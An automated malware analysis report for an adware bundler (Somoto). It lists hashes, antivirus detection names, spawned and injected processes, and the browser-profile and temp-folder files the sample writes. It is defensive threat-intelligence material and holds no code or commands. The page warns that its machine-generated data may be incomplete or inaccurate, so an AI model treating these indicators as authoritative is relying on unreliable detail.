Application.Bundler.Somoto.I_574d51bb68

by malwarelabrobot on April 9th, 2015 in Malware Descriptions.

Application.Bundler.Somoto.I (BitDefender), not-a-virus:Downloader.NSIS.Agent.go (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.Somoto.17 (DrWeb), Trojan.Gen.2 (Symantec), Application.Bundler.Somoto (FSecure), AdInstaller.Somoto (AVG), Win32:PUP-gen [PUP] (Avast), TROJ_GEN.R047C0VI314 (TrendMicro), Application.Bundler.Somoto.I (AdAware), SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, WormAutoItGen.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Installer, PUP, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
The sample has been submitted by Lavasoft customers.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 574d51bb688892ce2c77d046dcd15567
SHA1: 82433b7f3926ddfd536f92bf0f1da7f36fdd1633
SHA256: 714e6fdcf52223db21b081cc4c8b47c65865a05d67c2f1e11c1bb809efede1c5
SSDeep: 3072:h22ihA0m3BJf0vkqbOgMyCw0eJknf06kIIQ40yLeROBiKUJl:CA0m3T0vk7mJv61IQR7OBinl
Size: 166640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-12-17 11:14:12
Analyzed on: Windows7Ada SP1 64-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

BaofengUpdate.exe:3600
BaofengUpdate.exe:3212
D79A.tmp:2264
XTab_v4.0.exe:3152
smt_mystartsearch.exe:3356
ProtectService.exe:3120
ProtectService.exe:3188
Setup.exe:4008
Setup.exe:468
TPAutoConnSvc.exe:1844
appshat.exe:4072
biclient.exe:2452
unInstpw64.exe:2004
11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe:3456
powershell.exe:976
powershell.exe:1020
powershell.exe:3596
appshat_generic.exe:108
HPNotify.exe:3132
gentray.exe:2824
gentray.exe:3260
gentray.exe:3080
gentray.exe:1556
genieo_setup.gen:3380
cmdshell.exe:3084
genieo_setup.exe:1552
STab_Down_6.0.6.6.exe:3216
App Lid-codedownloader.exe:3672
App Lid-codedownloader.exe:3264
converter.exe:4068
regsvr32.exe:3688
regsvr32.exe:3720
regsvr32.exe:3404
webplayer_installer.exe:716
framework_setup.gen:1048
InstallGenieo.exe:4052
InstallGenieo.exe:1660
cscript.exe:3120
MsiExec.exe:3588
MsiExec.exe:1612
genupdater.exe:3144
Vlwgfsqfpaz.exe:3296
F365.tmp:3556
firsttime_setup.exe:3488
MSIEXEC.EXE:3852

The Application injects its code into the following process(es):

trayapp_setup.gen:1992
WebPlayer.exe:2984

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process BaofengUpdate.exe:3600 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (591 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\28A7.tmp (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BFVUpdateM.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\settings.js (5 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\last_tab.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\remoterequest.js (2 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\mystartsearch.xml (565 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\uninstallDlg2.xml (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Web Data (1518 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (480 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal (6322 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\422.json (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe (13122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\MessageBox.xml (3 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\279D.tmp (89 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\scrollbar.bmp (37 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code2.jpg (4 bytes)

The process BaofengUpdate.exe:3212 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe (930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\422.db (220 bytes)

The process D79A.tmp:2264 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\NSISEncrypt.dll (3412 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ilg (303824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\SourceApp.mg.exe (7798 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\ExecDos.dll (13 bytes)

The process XTab_v4.0.exe:3152 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\web\img\googlelogo.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (18027 bytes)
%Program Files% (x86)\XTab\conf (1606 bytes)
%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nskDD07.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1816 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\arrow.png (259 bytes)
%Program Files% (x86)\XTab\web\ver.txt (5 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\weather\0.png (1 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (1681 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (3 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\default_add_logo_hover.png (1 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (22156 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5312 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1025.xpi (14 bytes)
%Program Files% (x86)\XTab\web\img\default_add_logo.png (1 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (3 bytes)
%Program Files% (x86)\XTab\web\js\xagainit.js (3 bytes)
%Program Files% (x86)\XTab\web\img\googlelogo2.png (1526 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\img\default_logo.png (5 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (6812 bytes)
%Program Files% (x86)\XTab\web\js\ie8.js (156 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\msvcp110.dll (17526 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)

The process smt_mystartsearch.exe:3356 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\422.json (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\conf (83 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BaofengUpdate.exe (2461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\uninstallDlg2.xml (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\1.zip (197497 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BFVUpdateM.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\2.zip (47952 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\422.db (232 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\2[1].zip (70180 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\ffsearch_toolbar!1.0.0.1025.xpi (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code (4 bytes)
